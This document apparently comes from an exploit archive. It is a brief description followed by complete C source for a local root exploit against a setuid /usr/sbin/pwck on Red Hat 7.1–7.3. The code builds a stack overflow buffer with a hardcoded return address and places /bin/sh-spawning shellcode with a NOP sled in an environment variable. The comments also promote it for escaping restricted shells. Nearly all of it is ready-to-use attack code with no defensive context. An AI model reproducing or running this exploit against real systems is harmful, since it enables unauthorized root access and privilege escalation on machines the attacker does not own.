/usr/sbin/pwck local root exploit for Linux. It affects only systems where pwck is installed setuid (+s); note, though, that it is also a way to break free from restricted shells, even to the same UID. Tested on Red Hat 7.1, 7.2, and 7.3.
b75ad70961e03feeb4b123acf7bf9b70259f02d79f6d5b5aa604e838ec59e647
/* /usr/sbin/pwck local root exploit for linux */
/* Affects only pwck installed setuid (+s) */
/* Remember, though, it's a good way to break free */
/* from restricted shells - even to the same UID */
/* http://oakey.no-ip.com:82/uk2sec/ */
/* kiddie:password */
/* c0w_d0g3@yahoo.co.uk */
/* Tested on Redhat 7.1/2/3 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main()
{
char linuxshellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
"\x5b\xb0\x0b\x88\x53\x07\x52\x53"
"\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";
char buffer[3000];
long retaddr = 0xbfffffa1;
int padding = 2400;
char shell[512];
printf("\nuk2sec c0w_d0g3");
printf("\nThis is a local exploit for /usr/bin/pwck\n");
printf("Satic return address is at : %x\n\n", retaddr);
/* Building the buffer */
bzero(&buffer, sizeof(buffer));
memset(buffer,'A',padding); //size of buffer
*(unsigned long *)(buffer+strlen(buffer))=retaddr; //return address
memset(shell,0x90,100);
memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode));
memcpy(shell,"SHELLCODE=",10);
putenv(shell);
execl("/usr/sbin/pwck", "pwck", buffer, 0);
/* uid pwck +s */
}